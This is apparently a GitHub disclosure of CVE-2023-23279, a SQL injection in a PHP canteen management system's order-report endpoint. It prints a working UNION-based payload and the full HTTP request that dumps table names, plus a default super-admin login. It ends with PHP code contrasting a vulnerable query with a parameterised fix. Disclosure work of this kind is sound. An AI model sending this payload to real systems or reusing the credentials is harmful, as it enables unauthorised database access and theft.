tuannq2299 / CVE-2023-23279


SQL injection in Canteen Management System v1.0.

Bug author: Tuannq

Discovered Day: 5/1/2023

Vendor: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /php_action/getOrderReport.php

Vulnerability location: /php_action/getOrderReport.php, startDate

CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Payload: startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-

POST /youthappam/php_action/getOrderReport.php HTTP/1.1
Host: localhost
Content-Length: 297
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="104"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localhost/youthappam/report.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-&endDate=2023-01-06

The request can be sent by an unauthenticated user; for that reason, the CVSS score of this vulnerability is 9.8.

PoC

Source Code Analysis

The value of the startDate parameter is passed directly into the SQL query and executed without any sanitization or parameter binding.
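As an added illustration (not the project's own code), the following sketches the vulnerable pattern the analysis describes beside a hardened version that validates the date and binds it as a parameter; the table and column names, the function names and the connection settings are assumptions for illustration only.

```php
<?php
// Added example (not code from the project): illustrative reconstruction of
// the vulnerable pattern, followed by a hardened version.
// Table name "orders" and column "order_date" are assumptions.

// --- Vulnerable pattern: user input concatenated straight into the query ---
function getOrderReportVulnerable(mysqli $db, string $startDate, string $endDate): array {
    // The POST value ends up inside the SQL string with no validation, so a
    // single quote in the input changes the structure of the statement.
    $sql = "SELECT * FROM orders WHERE order_date BETWEEN '$startDate' AND '$endDate'";
    $result = $db->query($sql);
    return $result ? $result->fetch_all(MYSQLI_ASSOC) : [];
}

// --- Hardened version: validate the format, then bind as a parameter ---
function isValidIsoDate(string $value): bool {
    // Accept only a strict YYYY-MM-DD that round-trips through DateTime; the
    // round-trip rejects overflowed dates such as 2023-02-30 as well as any
    // value carrying extra characters (quotes, comments, SQL keywords).
    $dt = DateTime::createFromFormat('!Y-m-d', $value);
    return $dt !== false && $dt->format('Y-m-d') === $value;
}

function getOrderReportSafe(mysqli $db, string $startDate, string $endDate): array {
    if (!isValidIsoDate($startDate) || !isValidIsoDate($endDate)) {
        throw new InvalidArgumentException('startDate/endDate must be YYYY-MM-DD');
    }
    // Placeholders keep the data separate from the SQL text, so the values
    // are never parsed as SQL regardless of their content.
    $stmt = $db->prepare('SELECT * FROM orders WHERE order_date BETWEEN ? AND ?');
    $stmt->bind_param('ss', $startDate, $endDate);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Usage (assumed connection parameters; database name taken from the
// request path on this page):
// $db = new mysqli('localhost', 'dbuser', 'dbpass', 'youthappam');
// $rows = getOrderReportSafe($db, $_POST['startDate'] ?? '', $_POST['endDate'] ?? '');
```

The validation step alone is not the fix; the prepared statement is what removes the injection, and the date check simply turns malformed input into a clean error instead of a database error.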
